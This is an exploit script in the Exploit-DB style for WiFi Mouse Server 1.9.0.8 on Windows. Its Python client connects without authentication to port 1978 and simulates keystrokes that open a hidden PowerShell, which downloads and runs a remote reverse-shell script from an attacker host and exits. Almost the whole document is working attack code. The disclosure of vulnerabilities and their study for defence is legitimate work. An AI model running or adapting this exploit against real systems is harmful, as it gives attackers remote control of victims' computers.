# Exploit Title: Wifi Mouse version 1.9.0.8 - Remote Code Execution
# Date: 19/07/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://wifimouse.necta.us/
# Software Link: https://wifimouse.necta.us/apk/MouseServer.exe
# Version: 1.9.0.8 (Windows)
# Tested on: Windows 10 / Windows 11


'''
Description:

WiFi Mouse Server 1.9.0.8 allows unauthenticated remote code execution by
simulating keyboard input over TCP port 1978. This exploit connects to the
server, simulates a  keystrokes to delivery reverse shell.


'''


import socket
import time

class RemoteControlClient:
    def __init__(self, ip="192.168.8.103", port=1978):
        self.target_ip = ip
        self.target_port = port
        self.socket = None
        self.output_stream = None
        self.isystem = 0

    def connect(self):
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.connect((self.target_ip, self.target_port))
        self.output_stream = self.socket.makefile('wb')
        handshake = [b"reportCurrentApp\x0a", b"dontreportCurrentApp\x0a"]
        for cmd in handshake:
            self.socket.sendall(cmd)
            time.sleep(0.08)
        self.socket.recv(1024)

    def _send_command(self, prefix, command):
        length = len(command)
        length_prefix = f"{prefix}  {length}" if length < 10 else
f"{prefix} {length}"
        message = (length_prefix + command).encode('utf-8')
        self.output_stream.write(message)
        self.output_stream.flush()
        time.sleep(0.03)

    def send_key(self, key_name, action="press"):
        key_mapping =
{"ENTER":"RTN","BACKSPACE":"BAS","DEL":"BAS","WIN":"WIN","ALT":"ALT"}
        key_name = key_mapping.get(key_name.upper(), key_name)
        if action == "press":
            self._send_command("key", f"[R] {key_name} d")
            time.sleep(0.07)
            self._send_command("key", f"[R] {key_name} u")
        elif action == "down":
            self._send_command("key", f"[R] {key_name} d")
        elif action == "up":
            self._send_command("key", f"[R] {key_name} u")

    def send_key_code(self, key_code, action="press"):
        if key_code == 66:
            self.send_key("RTN", action)
        elif key_code == 67:
            self.send_key("BAS", action)
        else:
            self._send_command("key", f"[R] {key_code} {action[0]}")

    def send_text(self, text):
        for char in text:
            if char == '\n':
                self.send_key("ENTER")
            elif char == '\b':
                self.send_key("BACKSPACE")
            else:
                self.socket.sendall(f"utf8 {char}\x0a".encode('utf-8'))
                time.sleep(0.09)

    def execute_payload(self):
        try:
            self.connect()
            time.sleep(0.9)
            self.send_key("WIN")
            time.sleep(0.9)
            self.send_text("powershell -nop -w hidden -c \"iwr
http://192.168.8.102:8080/shell.ps1 -UseBasicParsing | iex\"")
            time.sleep(1)
            self.send_key_code(66)
            time.sleep(1)
            self.send_text("exit")
            self.send_key_code(66)
        except Exception:
            pass
        finally:
            if self.socket:
                self.socket.close()

if __name__ == "__main__":
    rc = RemoteControlClient()
    rc.execute_payload()